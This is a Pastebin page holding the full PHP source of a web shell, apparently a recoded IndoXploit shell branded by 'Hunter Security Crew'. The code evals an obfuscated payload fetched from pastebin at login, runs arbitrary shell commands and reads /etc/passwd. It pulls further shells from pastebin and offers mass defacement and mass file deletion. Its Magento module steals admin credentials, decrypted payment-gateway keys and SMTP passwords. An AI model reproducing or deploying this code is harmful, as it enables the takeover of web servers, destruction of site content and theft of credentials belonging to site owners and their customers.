Hscrew

Hunter Security Crew PrivShell V.1 Realese

Dec 9th, 2017
322
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 226.25 KB | None | 0 0
  1. <?php
  2. //IndoXploit Shell
  3. //IndoXploit Shell V1 Recoded By Hunter Security Crew
  4. //default password "IndoXploit"
  5. //hscrew
  6. @session_start();
  7. @error_reporting(0);
  8. @error_log(0);
  9. @ini_set('error_log',NULL);
  10. @ini_set('log_errors',0);
  11. @ini_set('max_execution_time',0);
  12. @ini_set('output_buffering',0);
  13. @ini_set('display_errors', 0);
  14. @set_time_limit(0);
  15. @set_magic_quotes_runtime(0);
  16. $lol="6352bb245c871f8049a90b25ccd6ac11"; //password(md5)
  17. function printLogin() {
  18. ?>
  19. <center><br><br>
  20. <header>
  21. <br><br><br><br><br><br>
  22. <div align="center">
  23. <img class="img_fuck" src="https://i.imgur.com/F8cx30L.png" style="width:600">
  24. </div><br><br>
  25. </header>
  26. <div style="border:1px solid #000000;background:#000000;width:320px;padding:5px;">
  27. <br>
  28. <style>
  29. body { color:#40FF00;background:url(http://wallpapers.ae/wp-content/uploads/2015/02/Mac-Apple-Abstract-HD-Image.jpg) no-repeat center center fixed;}
  30. input { color:#000000;margin:0;background-color:black;border:1px solid #000000; }
  31. </style>
  32. <center>
  33. <form method=post>
  34. <input type=password name=jancox>
  35. </form></center>
  36. <?php
  37. eval(gzinflate(base64_decode(file_get_contents('http://pastebin.com/raw/6PJ9Pj8F'))));
  38. exit;
  39. }
  40. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  41. if( empty( $lol ) ||
  42. ( isset( $_POST['jancox'] ) && ( md5($_POST['jancox']) == $lol ) ) )
  43. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  44. else
  45. printLogin();
  46. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  47. @ob_clean();
  48. $file = $_GET['file'];
  49. header('Content-Description: File Transfer');
  50. header('Content-Type: application/octet-stream');
  51. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  52. header('Expires: 0');
  53. header('Cache-Control: must-revalidate');
  54. header('Pragma: public');
  55. header('Content-Length: ' . filesize($file));
  56. readfile($file);
  57. exit;
  58. }
  59.  
  60. ?>
  61. <html>
  62. <head>
  63. <title>Hunter Security Crew Shell V1</title>
  64. <meta name='author' content='IndoXploit'>
  65. <meta charset="UTF-8">
  66. <style type='text/css'>
  67. @import url(https://fonts.googleapis.com/css?family=Abel);
  68. html {
  69. background: #000000;
  70. color: #ffffff;
  71. font-family: 'Abel';
  72. font-size: 13px;
  73. width: 100%;
  74. }
  75. li {
  76. display: inline;
  77. margin: 5px;
  78. padding: 5px;
  79. }
  80. table, th, td {
  81. border-collapse:collapse;
  82. font-family: Tahoma, Geneva, sans-serif;
  83. background: transparent;
  84. font-family: 'Abel';
  85. font-size: 13px;
  86. }
  87. .table_home, .th_home, .td_home {
  88. border: 1px solid #ffffff;
  89. }
  90. th {
  91. padding: 10px;
  92. }
  93. a {
  94. color: #ffffff;
  95. text-decoration: none;
  96. }
  97. a:hover {
  98. color: gold;
  99. text-decoration: underline;
  100. }
  101. b {
  102. color: gold;
  103. }
  104. input[type=text], input[type=password],input[type=submit] {
  105. background: transparent;
  106. color: #ffffff;
  107. border: 1px solid #ffffff;
  108. margin: 5px auto;
  109. padding-left: 5px;
  110. font-family: 'Abel';
  111. font-size: 13px;
  112. }
  113. textarea {
  114. border: 1px solid #ffffff;
  115. width: 100%;
  116. height: 400px;
  117. padding-left: 5px;
  118. margin: 10px auto;
  119. resize: none;
  120. background: transparent;
  121. color: #ffffff;
  122. font-family: 'Abel';
  123. font-size: 13px;
  124. }
  125. select {
  126. background: transparent;
  127. color: #ffffff;
  128. border: 1px solid #ffffff;
  129. margin: 5px auto;
  130. padding-left: 5px;
  131. font-family: 'Abel';
  132. font-size: 13px;
  133. }
  134. .but {
  135. background: transparent;
  136. color: #ffffff;
  137. border: 1px solid #ffffff;
  138. margin: 5px auto;
  139. padding-left: 5px;
  140. font-family: 'Abel';
  141. font-size: 13px;
  142. }
  143. </style>
  144. </head>
  145. <!-- head info start here -->
  146. <div class="head_info">
  147. <center>
  148. <pre>
  149.  
  150. _ _ ____
  151. | | | |___ / ___|
  152. | |_| / __| |
  153. | _ \__ \ |___
  154. |_| |_|___/\____|
  155.  
  156.  
  157. </pre>
  158. </center>
  159. <table ><tr>
  160. <td style="padding: 5px;"><?php echo $buff; ?></td>
  161. </tr></table>
  162. </div>
  163. <!-- head info end here -->
  164. <style>
  165. body { color:#40FF00;background:url(http://deskbg.com/i/c/750x422/wpp/14/14277/colourful-wolf-face-desktop-background.jpg) no-repeat center center fixed;}
  166. input { color:#40FF00;margin:0;background-color:black;border:1px solid #40FF00; }
  167. </style>
  168. <?php
  169. if (file_exists("php.ini")){
  170. }else{
  171. $img = fopen('php.ini', 'w');
  172. $sec = "safe_mode = OFF
  173. disable_funtions = NONE";
  174. fwrite($img ,$sec);
  175. fclose($img);}
  176. function w($dir,$perm) {
  177. if(!is_writable($dir)) {
  178. return "<font color=red>".$perm."</font>";
  179. } else {
  180. return "<font color=lime>".$perm."</font>";
  181. }
  182. }
  183. function UrlLoop($url,$type){
  184.  
  185. $urlArray = array();
  186.  
  187. $ch = curl_init();
  188. curl_setopt($ch, CURLOPT_URL, $url);
  189. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  190. $result = curl_exec($ch);
  191.  
  192. $regex='|<a.*?href="(.*?)"|';
  193. preg_match_all($regex,$result,$parts);
  194. $links=$parts[1];
  195. foreach($links as $link){
  196. array_push($urlArray, $link);
  197. }
  198. curl_close($ch);
  199.  
  200. foreach($urlArray as $value){
  201. $lol="$url$value";
  202. if(preg_match("#$type#is", $lol)) {
  203. echo "$lol\r\n";
  204. }
  205. }
  206. }
  207. function exe($cmd) {
  208. if(function_exists('system')) {
  209. @ob_start();
  210. @system($cmd);
  211. $buff = @ob_get_contents();
  212. @ob_end_clean();
  213. return $buff;
  214. } elseif(function_exists('exec')) {
  215. @exec($cmd,$results);
  216. $buff = "";
  217. foreach($results as $result) {
  218. $buff .= $result;
  219. } return $buff;
  220. } elseif(function_exists('passthru')) {
  221. @ob_start();
  222. @passthru($cmd);
  223. $buff = @ob_get_contents();
  224. @ob_end_clean();
  225. return $buff;
  226. } elseif(function_exists('shell_exec')) {
  227. $buff = @shell_exec($cmd);
  228. return $buff;
  229. }
  230. }
  231. function perms($file){
  232. $perms = fileperms($file);
  233. if (($perms & 0xC000) == 0xC000) {
  234. $info = 's';
  235. } elseif (($perms & 0xA000) == 0xA000) {
  236. $info = 'l';
  237. } elseif (($perms & 0x8000) == 0x8000) {
  238. $info = '-';
  239. } elseif (($perms & 0x6000) == 0x6000) {
  240. $info = 'b';
  241. } elseif (($perms & 0x4000) == 0x4000) {
  242. $info = 'd';
  243. } elseif (($perms & 0x2000) == 0x2000) {
  244. $info = 'c';
  245. } elseif (($perms & 0x1000) == 0x1000) {
  246. $info = 'p';
  247. } else {
  248. $info = 'u';
  249. }
  250. $info .= (($perms & 0x0100) ? 'r' : '-');
  251. $info .= (($perms & 0x0080) ? 'w' : '-');
  252. $info .= (($perms & 0x0040) ?
  253. (($perms & 0x0800) ? 's' : 'x' ) :
  254. (($perms & 0x0800) ? 'S' : '-'));
  255. $info .= (($perms & 0x0020) ? 'r' : '-');
  256. $info .= (($perms & 0x0010) ? 'w' : '-');
  257. $info .= (($perms & 0x0008) ?
  258. (($perms & 0x0400) ? 's' : 'x' ) :
  259. (($perms & 0x0400) ? 'S' : '-'));
  260. $info .= (($perms & 0x0004) ? 'r' : '-');
  261. $info .= (($perms & 0x0002) ? 'w' : '-');
  262. $info .= (($perms & 0x0001) ?
  263. (($perms & 0x0200) ? 't' : 'x' ) :
  264. (($perms & 0x0200) ? 'T' : '-'));
  265. return $info;
  266. }
  267. function hdd($s) {
  268. if($s >= 1073741824)
  269. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  270. elseif($s >= 1048576)
  271. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  272. elseif($s >= 1024)
  273. return sprintf('%1.2f',$s / 1024 ) .' KB';
  274. else
  275. return $s .' B';
  276. }
  277. function ambilKata($param, $kata1, $kata2){
  278. if(strpos($param, $kata1) === FALSE) return FALSE;
  279. if(strpos($param, $kata2) === FALSE) return FALSE;
  280. $start = strpos($param, $kata1) + strlen($kata1);
  281. $end = strpos($param, $kata2, $start);
  282. $return = substr($param, $start, $end - $start);
  283. return $return;
  284. }
  285. if(get_magic_quotes_gpc()) {
  286. function idx_ss($array) {
  287. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  288. }
  289. $_POST = idx_ss($_POST);
  290. }
  291. function CreateTools($names,$lokasi){
  292. if ( $_GET['create'] == $names ){
  293. $a= "".$_SERVER['SERVER_NAME']."";
  294. $b= dirname($_SERVER['PHP_SELF']);
  295. $c = "/cox_tools/".$names.".php";
  296. if (file_exists('cox_tools/'.$names.'.php')){
  297. echo '<script type="text/javascript">alert("Done");window.location.href = "cox_tools/'.$names.'.php";</script> ';
  298. }
  299. else {mkdir("cox_tools", 0777);
  300. file_put_contents('cox_tools/'.$names.'.php', file_get_contents($lokasi));
  301. echo ' <script type="text/javascript">alert("Done");window.location.href = "cox_tools/'.$names.'.php";</script> ';}}}
  302.  
  303. CreateTools("wso","http://pastebin.com/raw/3eh3Gej2");
  304. CreateTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
  305. CreateTools("b374k","http://pastebin.com/raw/rZiyaRGV");
  306. CreateTools("injection","http://pastebin.com/raw/nxxL8c1f");
  307. CreateTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
  308. CreateTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
  309. CreateTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
  310. CreateTools("tokopedia","http://pastebin.com/dvhzWgby");
  311. CreateTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
  312. CreateTools("mailer","http://pastebin.com/raw/9yu1DmJj");
  313. CreateTools("r57","http://pastebin.com/raw/G2VEDunW");
  314. CreateTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
  315. CreateTools("extractor","http://pastebin.com/raw/jQnMFHBL");
  316. CreateTools("bh","http://pastebin.com/raw/3L2ESWeu");
  317. CreateTools("dhanus","http://pastebin.com/raw/v4xGus6X");
  318. if(isset($_GET['dir'])) {
  319. $dir = $_GET['dir'];
  320. chdir($_GET['dir']);
  321. } else {
  322. $dir = getcwd();
  323. }
  324. $dir = str_replace("\\","/",$dir);
  325. $scdir = explode("/", $dir);
  326. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  327. $ling="http://".$_SERVER['SERVER_NAME']."".$_SERVER['PHP_SELF']."?create";
  328. $ds = @ini_get("disable_functions");
  329. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  330. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  331. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  332. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  333. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  334. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  335. if(!function_exists('posix_getegid')) {
  336. $user = @get_current_user();
  337. $uid = @getmyuid();
  338. $gid = @getmygid();
  339. $group = "?";
  340. } else {
  341. $uid = @posix_getpwuid(posix_geteuid());
  342. $gid = @posix_getgrgid(posix_getegid());
  343. $user = $uid['name'];
  344. $uid = $uid['uid'];
  345. $group = $gid['name'];
  346. $gid = $gid['gid'];
  347. }
  348. $d0mains = @file("/etc/named.conf");
  349. $users=@file('/etc/passwd');
  350. if($d0mains)
  351. {
  352. $count;
  353. foreach($d0mains as $d0main)
  354. {
  355. if(@ereg("zone",$d0main))
  356. {
  357. preg_match_all('#zone "(.*)"#', $d0main, $domains);
  358. flush();
  359. if(strlen(trim($domains[1][0])) > 2)
  360. {
  361. flush();
  362. $count++;
  363. }
  364. }
  365. }
  366. }
  367.  
  368. $sport=$_SERVER['SERVER_PORT'];
  369. echo "<table style='width:100%'>";
  370. echo "<tr><td>System: <font color=lime>".php_uname()."</font></td></tr>";
  371. echo "<tr><td>User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")</td></tr>";
  372. echo "<tr><td>Server IP: <font color=lime>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font></td></tr>";
  373. echo "<tr><td>HDD: <font color=lime>".hdd(disk_free_space("/"))."</font> / <font color=lime>".hdd(disk_total_space("/"))."</font></td></tr>";
  374. echo "<tr><td>Websites :<font color=lime> $count </font> Domains</td></tr>";
  375. echo "<tr><td>Port :<font color=lime> $sport</font> </td></tr>";
  376. echo "<tr><td>Safe Mode: $sm</td></tr>";
  377. echo "<tr><td>Disable Functions: $show_ds</td></tr>";
  378.  
  379. echo "<tr><td>MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </td></tr>";
  380. echo "<tr><td>Current DIR: ";
  381. foreach($scdir as $c_dir => $cdir) {
  382. echo "<a href='?dir=";
  383. for($i = 0; $i <= $c_dir; $i++) {
  384. echo $scdir[$i];
  385. if($i != $c_dir) {
  386. echo "/";
  387. }
  388. }
  389. echo "'>$cdir</a>/";
  390. }
  391. echo "<tr><td><form method='post' action='?dir=$dir&do=cmd'>
  392. Command :
  393. <input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
  394. </form></td></tr>";
  395. echo "</table><hr>";
  396. echo "<center>";
  397. echo "<ul>";
  398. echo "<li>[ <a href='?'>Home</a> ]</li>";
  399. echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
  400. echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
  401. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
  402. echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
  403. echo "<li>[ <a href='?dir=$dir&do=symconfig'>Config V.2</a> ]</li>";
  404. echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
  405. echo "<li>[ <a href='?dir=$dir&do=symlink'>Symlink</a> ]<br></li>";
  406. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
  407. echo "<li>[ <a href='?dir=$dir&do=cpftp_auto'>CPanel/FTP Auto Deface</a> ]</li>";
  408. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
  409. echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
  410. echo "<li>[ <a href='?dir=$dir&do=defacerid'>Defacer.ID</a> ]</li>";
  411. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li><br>";
  412. echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
  413. echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li>";
  414. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
  415. echo "<li>[ <a href='?dir=$dir&do=auto_wp'>WordPress Auto Edit Title</a> ]</li>";
  416. echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
  417. echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
  418. echo "<li>[ <a href='?dir=$dir&do=auto_cu_wp'>WordPress Auto Edit User V.2</a> ]</li>";
  419. echo "<li>[ <a href='?dir=$dir&do=auto_cu_joomla'>Joomla Auto Edit User V.2</a> ]</li>";
  420. echo "<li>[ <a href='?dir=$dir&do=passwbypass'>Bypass etc/pass</a> ]<br></li>";
  421. echo "<li>[ <a href='?dir=$dir&do=loghunter'>Log Hunter</a> ]</li>";
  422. echo "<li>[ <a href='?dir=$dir&do=shellchk'>Shell Checker</a> ]</li>";
  423. echo "<li>[ <a href='?dir=$dir&do=shelscan'>Shell Finder</a> ]</li>";
  424. echo "<li>[ <a href='?dir=$dir&do=zip'>Zip Menu</a> ]</li>";
  425. echo "<li>[ <a href='?dir=$dir&do=injectcode'>Code Inject</a> ]</li>";
  426. echo "<li>[ <a href='?dir=$dir&do=about'>About</a> ]</li>";
  427. echo "<li>[ <a href='?dir=$dir&do=magen'>Magento DB Info</a> ]</li><br>";
  428. echo "<li>[ <a href='?dir=$dir&do=metu'>LogOut</a> ]<br></li>";
  429. echo "</ul>";
  430. echo "</center>";
  431. echo "<hr>";
  432. if($_GET['do'] == 'upload') {
  433. echo "<center>";
  434. if($_POST['upload']) {
  435. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  436. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  437. } else {
  438. $act = "<font color=red>failed to upload file</font>";
  439. }
  440. }
  441. echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
  442. echo $act;
  443. echo "</center>";
  444. }
  445. elseif($_GET['do'] == 'cmd') {
  446. if($_POST['do_cmd']) {
  447. echo "<pre>".exe($_POST['cmd'])."</pre>";
  448. }
  449. } elseif($_GET['do'] == 'mass_deface') {
  450. echo "<center><form action=\"\" method=\"post\">\n";
  451. $dirr=$_POST['d_dir'];
  452. $index = $_POST["script"];
  453. $index = str_replace('"',"'",$index);
  454. $index = stripslashes($index);
  455. function edit_file($file,$index){
  456. if (is_writable($file)) {
  457. clear_fill($file,$index);
  458. echo "<Span style='color:green;'><strong> [+] Coly massal 100% Successfull </strong></span><br></center>";
  459. }
  460. else {
  461. echo "<Span style='color:red;'><strong> [-] Aduh Thod Gabisa Coly Disini :( </strong></span><br></center>";
  462. }
  463. }
  464. function hapus_massal($dir,$namafile) {
  465. if(is_writable($dir)) {
  466. $dira = scandir($dir);
  467. foreach($dira as $dirb) {
  468. $dirc = "$dir/$dirb";
  469. $lokasi = $dirc.'/'.$namafile;
  470. if($dirb === '.') {
  471. if(file_exists("$dir/$namafile")) {
  472. unlink("$dir/$namafile");
  473. }
  474. } elseif($dirb === '..') {
  475. if(file_exists("".dirname($dir)."/$namafile")) {
  476. unlink("".dirname($dir)."/$namafile");
  477. }
  478. } else {
  479. if(is_dir($dirc)) {
  480. if(is_writable($dirc)) {
  481. if(file_exists($lokasi)) {
  482. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  483. unlink($lokasi);
  484. $idx = hapus_massal($dirc,$namafile);
  485. }
  486. }
  487. }
  488. }
  489. }
  490. }
  491. }
  492. function clear_fill($file,$index){
  493. if(file_exists($file)){
  494. $handle = fopen($file,'w');
  495. fwrite($handle,'');
  496. fwrite($handle,$index);
  497. fclose($handle); } }
  498.  
  499. function gass(){
  500. global $dirr , $index ;
  501. chdir($dirr);
  502. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  503. $files = scandir($dirr) ;
  504. $notallow = array(".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","..",".");
  505. sort($files);
  506. $n = 0 ;
  507. foreach ($files as $file){
  508. if ( $file != $me && is_dir($file) != 1 && !in_array($file, $notallow) ) {
  509. echo "<center><Span style='color: #8A8A8A;'><strong>$dirr/</span>$file</strong> ====> ";
  510. edit_file($file,$index);
  511. flush();
  512. $n = $n +1 ;
  513. }
  514. }
  515. echo "<br>";
  516. echo "<center><br><h3>$n Anda Telah Ngecrot Disini </h3></center><br>";
  517. }
  518. function ListFiles($dirrall) {
  519.  
  520. if($dh = opendir($dirrall)) {
  521.  
  522. $files = Array();
  523. $inner_files = Array();
  524. $me = str_replace(dirname(__FILE__).'/','',__FILE__);
  525. $notallow = array($me,".htaccess","error_log","_vti_inf.html","_private","_vti_bin","_vti_cnf","_vti_log","_vti_pvt","_vti_txt","cgi-bin",".contactemail",".cpanel",".fantasticodata",".htpasswds",".lastlogin","access-logs","cpbackup-exclude-used-by-backup.conf",".cgi_auth",".disk_usage",".statspwd","Thumbs.db");
  526. while($file = readdir($dh)) {
  527. if($file != "." && $file != ".." && $file[0] != '.' && !in_array($file, $notallow) ) {
  528. if(is_dir($dirrall . "/" . $file)) {
  529. $inner_files = ListFiles($dirrall . "/" . $file);
  530. if(is_array($inner_files)) $files = array_merge($files, $inner_files);
  531. } else {
  532. array_push($files, $dirrall . "/" . $file);
  533. }
  534. }
  535. }
  536.  
  537. closedir($dh);
  538. return $files;
  539. }
  540. }
  541. function gass_all(){
  542. global $index ;
  543. $dirrall=$_POST['d_dir'];
  544. foreach (ListFiles($dirrall) as $key=>$file){
  545. $file = str_replace('//',"/",$file);
  546. echo "<center><strong>$file</strong> ===>";
  547. edit_file($file,$index);
  548. flush();
  549. }
  550. $key = $key+1;
  551. echo "<center><br><h3>$key Anda Telah Ngecrot Disini </h3></center><br>"; }
  552. function sabun_massal($dir,$namafile,$isi_script) {
  553. if(is_writable($dir)) {
  554. $dira = scandir($dir);
  555. foreach($dira as $dirb) {
  556. $dirc = "$dir/$dirb";
  557. $lokasi = $dirc.'/'.$namafile;
  558. if($dirb === '.') {
  559. file_put_contents($lokasi, $isi_script);
  560. } elseif($dirb === '..') {
  561. file_put_contents($lokasi, $isi_script);
  562. } else {
  563. if(is_dir($dirc)) {
  564. if(is_writable($dirc)) {
  565. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  566. file_put_contents($lokasi, $isi_script);
  567. $idx = sabun_massal($dirc,$namafile,$isi_script);
  568. }
  569. }
  570. }
  571. }
  572. }
  573. }
  574. if($_POST['mass'] == 'onedir') {
  575. echo "<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\n";
  576. $ini="http://";
  577. $mainpath=$_POST[d_dir];
  578. $file=$_POST[d_file];
  579. $dir=opendir("$mainpath");
  580. $code=base64_encode($_POST[script]);
  581. $indx=base64_decode($code);
  582. while($row=readdir($dir)){
  583. $start=@fopen("$row/$file","w+");
  584. $finish=@fwrite($start,$indx);
  585. if ($finish){
  586. echo"$ini$row/$file\n";
  587. }
  588. }
  589. echo "</textarea><br><br><br><b>Versi Text</b><br><br><br>\n";
  590. $mainpath=$_POST[d_dir];$file=$_POST[d_file];
  591. $dir=opendir("$mainpath");
  592. $code=base64_encode($_POST[script]);
  593. $indx=base64_decode($code);
  594. while($row=readdir($dir)){$start=@fopen("$row/$file","w+");
  595. $finish=@fwrite($start,$indx);
  596. if ($finish){echo '<a href="http://' . $row . '/' . $file . '" target="_blank">http://' . $row . '/' . $file . '</a><br>'; }
  597. }
  598.  
  599. }
  600. elseif($_POST['mass'] == 'Mass All Dir') { gass(); }
  601. elseif($_POST['mass'] == 'Mass Delete') { hapus_massal($_POST['d_dir'], $_POST['d_file']); }
  602. elseif($_POST['mass'] == 'Mass Deface') { gass_all(); }
  603. elseif($_POST['mass'] == 'massdeface') {
  604. echo "<div style='margin: 5px auto; padding: 5px'>";
  605. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  606. echo "</div>"; }
  607. else {
  608. echo "
  609. <center><font style='text-decoration: underline;'>
  610. Select Type:<br>
  611. </font>
  612. <select class=\"select\" name=\"mass\" style=\"width: 450px;\" height=\"10\">
  613. <option value=\"onedir\">Mass Deface 1 Dir</option>
  614. <option value=\"massdeface\">Mass Deface All Dir</option>
  615. <option value=\"Mass all dir\">Mass Deface 1 Dir</option>
  616. <option value=\"Mass Deface\">Mass Deface</option>
  617. <option value=\"Mass Delete\">Mass Delete Files</option></center></select><br>
  618. <font style='text-decoration: underline;'>Folder:</font><br>
  619. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  620. <font style='text-decoration: underline;'>Filename:</font><br>
  621. <input type='text' name='d_file' value='hscrew.php' style='width: 450px;' height='10'><br>
  622. <font style='text-decoration: underline;'>Index File:</font><br>
  623. <textarea name='script' style='width: 450px; height: 200px;'>Hacked By Hunter Security Crew</textarea><br>
  624. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  625. </form></center>";
  626. }
  627. }
  628. elseif($_GET['do'] == 'magen') {
  629. echo'
  630. <div id="page-wrap">
  631. <center>
  632. <br>
  633. <FORM action="" method="post">
  634. <div align="center">[M A G E N T O] - Stealing Information<br>
  635. <div align="center">coder: sohai & n4KuLa_<br>
  636. <input type="hidden" name="form_action" value="2">
  637. </div>
  638. </div>
  639. ';
  640.  
  641.  
  642. if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){
  643. $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml');
  644. if(isset($xml->global->resources->default_setup->connection)) {
  645. $connection = $xml->global->resources->default_setup->connection;
  646. $prefix = $xml->global->resources->db->table_prefix;
  647. $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1
  648. require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php';
  649.  
  650. try {
  651. $app = Mage::app('default');
  652. Mage::getSingleton('core/session', array('name'=>'frontend'));
  653. }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";}
  654.  
  655. if (!mysql_connect($connection->host, $connection->username, $connection->password)){
  656. print("Could not connect: " . mysql_error());
  657. }
  658. mysql_select_db($connection->dbname);
  659. echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n";
  660.  
  661. $crypto = new Varien_Crypt_Mcrypt();
  662. $crypto->init($key);
  663.  
  664. //=========================================================================================================
  665. $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'");
  666. if (!$query){
  667. echo "<center><b>Gagal</b></center>";
  668. }else{
  669. $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'"));
  670. echo'<br><br>
  671. ====================================================================<br>
  672. [ Admin FROM website : '.$site['website'].'] <br>
  673. ====================================================================<br>';
  674. }
  675. echo "
  676. <table border='1' align='center' >
  677. <tr>
  678. <td>id</td>
  679. <td>firstname</td>
  680. <td>lastname</td>
  681. <td>email</td>
  682. <td>username</td>
  683. <td>password</td>
  684. </tr>";
  685. while($vx = mysql_fetch_array($query)) {
  686. $no = 1;
  687. $user_id = $vx['user_id'];
  688. $username = $vx['username'];
  689. $password = $vx['password'];
  690. $email = $vx['email'];
  691. $firstname = $vx['firstname'];
  692. $lastname = $vx['lastname'];
  693. echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>";
  694. }
  695. echo "</table><br>";
  696. //=========================================================================================================
  697. $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'");
  698. if(mysql_num_rows($query) != 0){
  699. if (!$query){
  700. echo "<center><b>Gagal</b></center>";
  701. }else{
  702. echo'<br><br>
  703. ====================================================================<br>
  704. [ Authorizenet ] <br>
  705. ====================================================================<br>';
  706. }
  707. echo "
  708. <table border='1' align='center' >
  709. <tr>
  710. <td>no</td>
  711. <td>user</td>
  712. <td>pass</td>
  713. </tr>";
  714. $no = 1;
  715. while($vx = mysql_fetch_array($query)) {
  716. $user = $crypto->decrypt($vx['user']);
  717. $pass = $crypto->decrypt($vx['pass']);
  718.  
  719.  
  720. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  721. $no++;
  722. }
  723. echo "</table><br>";
  724. }
  725. //=========================================================================================================
  726. $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1");
  727. if(mysql_num_rows($query_smtp) != 0){
  728. if (!$query_smtp){
  729. echo "<center><b>Gagal</b></center>";
  730. }else{
  731. echo'<br><br>
  732. ====================================================================<br>
  733. [ SMTP ] <br>
  734. ====================================================================<br>';
  735. }
  736. echo "
  737. <table border='1' align='center' >
  738. <tr>
  739. <td>no</td>
  740. <td>host</td>
  741. <td>port</td>
  742. <td>user</td>
  743. <td>pass</td>
  744. </tr>";
  745. $no = 1;
  746. $batas = 0;
  747. while($rows = mysql_fetch_array($query_smtp)) {
  748. $smtphost = $rows[0];
  749. $smtpport = $rows[1];
  750. $smtpuser = $rows[2];
  751. $smtppass = $rows[3];
  752. echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>";
  753. $no++;
  754. }
  755. echo "</table><br>";
  756. }
  757. //=========================================================================================================
